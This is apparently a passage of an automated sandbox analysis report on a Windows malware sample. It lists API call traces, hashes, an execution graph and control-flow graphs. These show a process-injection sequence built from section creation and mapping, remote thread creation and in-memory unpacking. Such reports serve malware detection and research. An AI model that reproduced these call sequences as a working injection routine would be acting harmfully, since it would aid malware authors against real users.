                                                                  APIs
                                                                  • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                    • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                    • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                    • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1815050395.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_LgigaSKsL6.jbxd
                                                                  Similarity
                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                  • String ID:
                                                                  • API String ID: 1885482327-0
                                                                  • Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                  • Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
                                                                  • Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                  • Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F
                                                                  APIs
                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02C4A566
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816255737.0000000002C47000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C47000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2c47000_LgigaSKsL6.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                  • Instruction ID: c415ce0398daff5e63247e83cc6d59161442e051075ac0817daa6fd40fc14d08
                                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                  • Instruction Fuzzy Hash: 2E113C79A40208EFDB01DF98CA85E99BBF5EF08350F058094F9489B361D771EA90EF80
                                                                  APIs
                                                                  • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                    • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                    • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                    • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1815050395.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_LgigaSKsL6.jbxd
                                                                  Similarity
                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                  • String ID:
                                                                  • API String ID: 1885482327-0
                                                                  • Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                  • Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
                                                                  • Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                  • Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F
                                                                  APIs
                                                                  • LocalAlloc.KERNELBASE(00000000,02B19CE4,00415F0B), ref: 00415878
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1815075152.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_40b000_LgigaSKsL6.jbxd
                                                                  Similarity
                                                                  • API ID: AllocLocal
                                                                  • String ID:
                                                                  • API String ID: 3494564517-0
                                                                  • Opcode ID: edc34b9f6b4820ea05e34d55aad0c07fdf7bc1d6d5b6794533697c47ab2511c9
                                                                  • Instruction ID: d7b87d211da148203f6924bb85ac0980f9e485e76abd759aca5fb629b3ee17cc
                                                                  • Opcode Fuzzy Hash: edc34b9f6b4820ea05e34d55aad0c07fdf7bc1d6d5b6794533697c47ab2511c9
                                                                  • Instruction Fuzzy Hash: D3B092B0DC46409BD7008BA0A814B513AA4E308742F404461F505C2180DA2014208F14
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816464417.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2fc0000_LgigaSKsL6.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: .$GetProcAddress.$l
                                                                  • API String ID: 0-2784972518
                                                                  • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                  • Instruction ID: 8ff8b4bf2f8a73bf94ee3b62b2d3bd9cbce14d2bfb2d03d8720fd332c02ab9fb
                                                                  • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                  • Instruction Fuzzy Hash: BA3137B690060ADFDB14CF99C980BAEBBF9FB48364F24404ED541A7710DB71EA45CBA4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816255737.0000000002C47000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C47000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2c47000_LgigaSKsL6.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                  • Instruction ID: b9ab38117357e116a3c3c073e7a0336d274a407d4fd0ccb0e64697efbc55b2be
                                                                  • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                  • Instruction Fuzzy Hash: 74118E72380100EFD744DF55DC90EA773EAEB89320B198065ED04CB312EA79E802CB60
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1815050395.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_LgigaSKsL6.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
                                                                  • Instruction ID: 8df8bbe6331efc2743c071309605838865bd09ee4bc9229f5037613db63a7100
                                                                  • Opcode Fuzzy Hash: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
                                                                  • Instruction Fuzzy Hash: 3CF0F0A1E2E243AFCA0A1E34A916532AF1C751632372401FFA083752C2E23D0B17619F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1815050395.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_LgigaSKsL6.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
                                                                  • Instruction ID: 9241026e722b7dd7cbe781a55eac82938fa1721c21c2f19ebd5655df2a8ce19b
                                                                  • Opcode Fuzzy Hash: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
                                                                  • Instruction Fuzzy Hash: 90F024A191E281DBCA0E1E2858169327F1C7A5230733405FF9093762C2E13D8B02619F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816464417.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2fc0000_LgigaSKsL6.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                  • Instruction ID: 62bbbbe301047a0cc95ae73cb333040dad8261c8d9955c9f34ed1e45f27ca6e3
                                                                  • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                  • Instruction Fuzzy Hash: 3A01F772A10601CFDF21CF20C904BAA33E9EB85245F1540ACD60797241EB70A8428B90
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1815050395.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_LgigaSKsL6.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
                                                                  • Instruction ID: 0b233a05c36d383cd3dc693d5d52553799fa9f094e89171df70cdd77f1a33a14
                                                                  • Opcode Fuzzy Hash: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
                                                                  • Instruction Fuzzy Hash: 5CF027A1E6E202ABCA0E1E20AD165727F4D651132372401FFA053B63C1E17D4B07619F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1815050395.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_LgigaSKsL6.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
                                                                  • Instruction ID: 61f4eeca6a5bdba97633f9ce55ed0ebe4cfc5c7823726c26b0d716f95b27c2a1
                                                                  • Opcode Fuzzy Hash: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
                                                                  • Instruction Fuzzy Hash: 1EF027A191E242DBCA0D2E246D158322F4C295530733401FF9053B92C2E03E8B07619F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1815050395.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_LgigaSKsL6.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
                                                                  • Instruction ID: 50319dc6f67c7bb301174255112627998741b5b21f267b3f7f348d4aa007f6d0
                                                                  • Opcode Fuzzy Hash: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
                                                                  • Instruction Fuzzy Hash: A5E068A2D2E2029BCA1E1E206D464333F4C625630B72001FF9053B92C1F03E4B0661DF
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1815050395.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_LgigaSKsL6.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
                                                                  • Instruction ID: 65af031b81eeafed772fbc50416c1b4fdc84f259fd59d49ecec168145e9dac47
                                                                  • Opcode Fuzzy Hash: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
                                                                  • Instruction Fuzzy Hash: 3EE0ED92E6E2854BCAA52E30980A1623F5C69A331A32480FFA002A52D2F03E0F05815B
                                                                  APIs
                                                                  • BuildCommDCBA.KERNEL32(00000000,?), ref: 00415AA1
                                                                  • WritePrivateProfileStringA.KERNEL32(00418384,0041835C,00418330,0041830C), ref: 00415AC5
                                                                  • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00415ACD
                                                                  • GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 00415B0D
                                                                  • GetComputerNameW.KERNEL32(?,?), ref: 00415B21
                                                                  • SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00415B2F
                                                                  • OpenJobObjectA.KERNEL32(00000000,00000000,004183B4), ref: 00415B3E
                                                                  • GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 00415B4F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1815075152.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_40b000_LgigaSKsL6.jbxd
                                                                  Similarity
                                                                  • API ID: Name$AvailableBuildCalendarCommComputerEnvironmentFreeInfoMemoryNodeNumaObjectOpenPathPrivateProfileShortStringStringsWrite
                                                                  • String ID: -
                                                                  • API String ID: 113859268-2547889144
                                                                  • Opcode ID: a2c051fec9ab3a8fcdae7612af1167ef9935c89225a402f84f65136c1e913747
                                                                  • Instruction ID: 60e73b42405168cd9d510addef8ef3a8b6b73bded157f1632dd387b8ccc8cba3
                                                                  • Opcode Fuzzy Hash: a2c051fec9ab3a8fcdae7612af1167ef9935c89225a402f84f65136c1e913747
                                                                  • Instruction Fuzzy Hash: 9A21FB31A84348EBD7209F94DC85FDA7B74FB4CB52F1041AAF649AA1C0CAB41AC48F59
                                                                  APIs
                                                                  • QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00415BC4
                                                                  • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00415BDF
                                                                  • HeapDestroy.KERNEL32(00000000), ref: 00415BFE
                                                                  • GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 00415C06
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1815075152.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_40b000_LgigaSKsL6.jbxd
                                                                  Similarity
                                                                  • API ID: DestroyDeviceEnvironmentFreeHeapHighestNodeNumaNumberQueryStrings
                                                                  • String ID:
                                                                  • API String ID: 367530164-0
                                                                  • Opcode ID: 28caf57345e6d0fcc585ba126ae085f4f289dabcd7c9f6727abea3362d7c0c3f
                                                                  • Instruction ID: bd69beaec25cac2caedfc94357a42cf62531597c09bd692e524a47bad036f564
                                                                  • Opcode Fuzzy Hash: 28caf57345e6d0fcc585ba126ae085f4f289dabcd7c9f6727abea3362d7c0c3f
                                                                  • Instruction Fuzzy Hash: CD012630A84704DBD740EBB4ED45BEA7BB8FB0C746F404077F60A97280DE3428548B9A

                                                                  Execution Graph

                                                                  Execution Coverage:9.5%
                                                                  Dynamic/Decrypted Code Coverage:31.9%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:163
                                                                  Total number of Limit Nodes:7
                                                                  execution_graph 3371 402e40 3373 402e37 3371->3373 3374 402edf 3373->3374 3375 4018e6 3373->3375 3376 4018f5 3375->3376 3377 40192e Sleep 3376->3377 3378 401949 3377->3378 3380 40195a 3378->3380 3381 401514 3378->3381 3380->3374 3382 401524 3381->3382 3383 4015c4 NtDuplicateObject 3382->3383 3392 4016e0 3382->3392 3384 4015e1 NtCreateSection 3383->3384 3383->3392 3385 401661 NtCreateSection 3384->3385 3386 401607 NtMapViewOfSection 3384->3386 3388 40168d 3385->3388 3385->3392 3386->3385 3387 40162a NtMapViewOfSection 3386->3387 3387->3385 3389 401648 3387->3389 3390 401697 NtMapViewOfSection 3388->3390 3388->3392 3389->3385 3391 4016be NtMapViewOfSection 3390->3391 3390->3392 3391->3392 3392->3380 3412 415c20 3413 415c2d 3412->3413 3414 415ce7 InterlockedCompareExchange ReadConsoleA FindAtomW SetConsoleMode SearchPathW 3413->3414 3417 415e10 3413->3417 3416 415d4d 7 API calls 3414->3416 3415 415e20 SetCommState 3415->3417 3418 415e01 3416->3418 3419 415dfa PulseEvent 3416->3419 3417->3415 3420 415e39 3417->3420 3418->3417 3419->3418 3421 415f06 3420->3421 3422 415e46 7 API calls 3420->3422 3433 415870 LocalAlloc 3421->3433 3429 415eda 3422->3429 3426 415f0b LoadLibraryA 3434 4158a0 GetModuleHandleW GetProcAddress VirtualProtect 3426->3434 3427 415f5d 3435 415b90 3427->3435 3429->3421 3430 415f62 3431 415f99 InterlockedDecrement 3430->3431 3432 415faf 3430->3432 3431->3430 3433->3426 3434->3427 3436 415bb9 QueryDosDeviceW 3435->3436 3437 415bca 3435->3437 3436->3437 3446 415a30 3437->3446 3440 415be5 3449 415a70 3440->3449 3441 415bdd FreeEnvironmentStringsA 3441->3440 3444 415c0c 3444->3430 3445 415bfc HeapDestroy GetNumaHighestNodeNumber 3445->3444 3447 415a41 FatalAppExitA GetModuleHandleW 3446->3447 3448 415a53 3446->3448 3447->3448 3448->3440 3448->3441 3450 415a7d 3449->3450 3451 415aa9 3450->3451 3452 415a98 BuildCommDCBA 3450->3452 3453 415ab1 WritePrivateProfileStringA FreeEnvironmentStringsA 3451->3453 3455 415ad3 3451->3455 3452->3455 3453->3455 3456 415b5a 3455->3456 3457 415b09 GetNumaAvailableMemoryNode GetComputerNameW SetCalendarInfoA OpenJobObjectA GetShortPathNameW 3455->3457 3458 415a60 3455->3458 3456->3444 3456->3445 3457->3455 3461 4159f0 3458->3461 3462 415a19 3461->3462 3463 415a0c SetEvent 3461->3463 3462->3455 3463->3462 3544 401542 3545 40153b 3544->3545 3546 4015c4 NtDuplicateObject 3545->3546 3555 4016e0 3545->3555 3547 4015e1 NtCreateSection 3546->3547 3546->3555 3548 401661 NtCreateSection 3547->3548 3549 401607 NtMapViewOfSection 3547->3549 3551 40168d 3548->3551 3548->3555 3549->3548 3550 40162a NtMapViewOfSection 3549->3550 3550->3548 3552 401648 3550->3552 3553 401697 NtMapViewOfSection 3551->3553 3551->3555 3552->3548 3554 4016be NtMapViewOfSection 3553->3554 3553->3555 3554->3555 3468 2d79e9e 3469 2d79ead 3468->3469 3472 2d7a63e 3469->3472 3474 2d7a659 3472->3474 3473 2d7a662 CreateToolhelp32Snapshot 3473->3474 3475 2d7a67e Module32First 3473->3475 3474->3473 3474->3475 3476 2d79eb6 3475->3476 3477 2d7a68d 3475->3477 3479 2d7a2fd 3477->3479 3480 2d7a328 3479->3480 3481 2d7a371 3480->3481 3482 2d7a339 VirtualAlloc 3480->3482 3481->3481 3482->3481 3518 2cc0005 3523 2cc092b GetPEB 3518->3523 3520 2cc0030 3525 2cc003c 3520->3525 3524 2cc0972 3523->3524 3524->3520 3526 2cc0049 3525->3526 3527 2cc0e0f 2 API calls 3526->3527 3528 2cc0223 3527->3528 3529 2cc0d90 GetPEB 3528->3529 3530 2cc0238 VirtualAlloc 3529->3530 3531 2cc0265 3530->3531 3532 2cc02ce VirtualProtect 3531->3532 3533 2cc030b 3532->3533 3534 2cc0439 VirtualFree 3533->3534 3537 2cc04be LoadLibraryA 3534->3537 3536 2cc08c7 3537->3536 3538 2cc0001 3539 2cc0005 3538->3539 3540 2cc092b GetPEB 3539->3540 3541 2cc0030 3540->3541 3542 2cc003c 7 API calls 3541->3542 3543 2cc0038 3542->3543 3393 2cc003c 3394 2cc0049 3393->3394 3406 2cc0e0f SetErrorMode SetErrorMode 3394->3406 3399 2cc0265 3400 2cc02ce VirtualProtect 3399->3400 3401 2cc030b 3400->3401 3402 2cc0439 VirtualFree 3401->3402 3405 2cc04be LoadLibraryA 3402->3405 3404 2cc08c7 3405->3404 3407 2cc0223 3406->3407 3408 2cc0d90 3407->3408 3409 2cc0dad 3408->3409 3410 2cc0dbb GetPEB 3409->3410 3411 2cc0238 VirtualAlloc 3409->3411 3410->3411 3411->3399 3603 402dd0 3605 402ddc 3603->3605 3604 4018e6 8 API calls 3606 402edf 3604->3606 3605->3604 3605->3606 3499 4018f1 3500 4018f6 3499->3500 3501 40192e Sleep 3500->3501 3502 401949 3501->3502 3503 401514 7 API calls 3502->3503 3504 40195a 3502->3504 3503->3504 3590 401915 3591 40191a 3590->3591 3592 4018c6 3590->3592 3593 40192e Sleep 3591->3593 3594 401949 3593->3594 3595 401514 7 API calls 3594->3595 3596 40195a 3594->3596 3595->3596 3464 402f97 3465 402fc1 3464->3465 3466 4030ee 3464->3466 3465->3466 3467 40307c RtlCreateUserThread NtTerminateProcess 3465->3467 3467->3466 3483 2d79e8d 3484 2d79e9e 3483->3484 3485 2d7a63e 3 API calls 3484->3485 3486 2d79eb6 3485->3486 3580 402d7b 3581 402d38 3580->3581 3581->3580 3582 402dc7 3581->3582 3583 4018e6 8 API calls 3581->3583 3583->3582 3505 4014fe 3506 401506 3505->3506 3507 401531 3505->3507 3508 4015c4 NtDuplicateObject 3507->3508 3517 4016e0 3507->3517 3509 4015e1 NtCreateSection 3508->3509 3508->3517 3510 401661 NtCreateSection 3509->3510 3511 401607 NtMapViewOfSection 3509->3511 3513 40168d 3510->3513 3510->3517 3511->3510 3512 40162a NtMapViewOfSection 3511->3512 3512->3510 3514 401648 3512->3514 3515 401697 NtMapViewOfSection 3513->3515 3513->3517 3514->3510 3516 4016be NtMapViewOfSection 3515->3516 3515->3517 3516->3517

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 146 401514-401533 148 401524-40152f 146->148 149 401536-40156e call 401193 146->149 148->149 158 401570 149->158 159 401573-401578 149->159 158->159 161 401898-4018a0 159->161 162 40157e-40158f 159->162 161->159 165 4018a5-4018b7 161->165 166 401595-4015be 162->166 167 401896 162->167 173 4018c5 165->173 174 4018bc-4018e3 call 401193 165->174 166->167 175 4015c4-4015db NtDuplicateObject 166->175 167->165 173->174 175->167 178 4015e1-401605 NtCreateSection 175->178 180 401661-401687 NtCreateSection 178->180 181 401607-401628 NtMapViewOfSection 178->181 180->167 184 40168d-401691 180->184 181->180 183 40162a-401646 NtMapViewOfSection 181->183 183->180 186 401648-40165e 183->186 184->167 187 401697-4016b8 NtMapViewOfSection 184->187 186->180 187->167 189 4016be-4016da NtMapViewOfSection 187->189 189->167 191 4016e0 call 4016e5 189->191
                                                                  APIs
                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2073745396.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_vsvrjra.jbxd
                                                                  Similarity
                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                  • String ID:
                                                                  • API String ID: 1546783058-0
                                                                  • Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                  • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                                                  • Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                  • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 193 4014fe-401503 194 401531-40156e call 401193 193->194 195 401506-401511 193->195 205 401570 194->205 206 401573-401578 194->206 205->206 208 401898-4018a0 206->208 209 40157e-40158f 206->209 208->206 212 4018a5-4018b7 208->212 213 401595-4015be 209->213 214 401896 209->214 220 4018c5 212->220 221 4018bc-4018e3 call 401193 212->221 213->214 222 4015c4-4015db NtDuplicateObject 213->222 214->212 220->221 222->214 225 4015e1-401605 NtCreateSection 222->225 227 401661-401687 NtCreateSection 225->227 228 401607-401628 NtMapViewOfSection 225->228 227->214 231 40168d-401691 227->231 228->227 230 40162a-401646 NtMapViewOfSection 228->230 230->227 233 401648-40165e 230->233 231->214 234 401697-4016b8 NtMapViewOfSection 231->234 233->227 234->214 236 4016be-4016da NtMapViewOfSection 234->236 236->214 238 4016e0 call 4016e5 236->238
                                                                  APIs
                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2073745396.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_vsvrjra.jbxd
                                                                  Similarity
                                                                  • API ID: Section$CreateDuplicateObjectView
                                                                  • String ID:
                                                                  • API String ID: 1652636561-0
                                                                  • Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                  • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                                                  • Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                  • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 240 401542-40156e call 401193 249 401570 240->249 250 401573-401578 240->250 249->250 252 401898-4018a0 250->252 253 40157e-40158f 250->253 252->250 256 4018a5-4018b7 252->256 257 401595-4015be 253->257 258 401896 253->258 264 4018c5 256->264 265 4018bc-4018e3 call 401193 256->265 257->258 266 4015c4-4015db NtDuplicateObject 257->266 258->256 264->265 266->258 269 4015e1-401605 NtCreateSection 266->269 271 401661-401687 NtCreateSection 269->271 272 401607-401628 NtMapViewOfSection 269->272 271->258 275 40168d-401691 271->275 272->271 274 40162a-401646 NtMapViewOfSection 272->274 274->271 277 401648-40165e 274->277 275->258 278 401697-4016b8 NtMapViewOfSection 275->278 277->271 278->258 280 4016be-4016da NtMapViewOfSection 278->280 280->258 282 4016e0 call 4016e5 280->282
                                                                  APIs
                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2073745396.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_vsvrjra.jbxd
                                                                  Similarity
                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                  • String ID:
                                                                  • API String ID: 1546783058-0
                                                                  • Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                  • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                                                  • Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                  • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

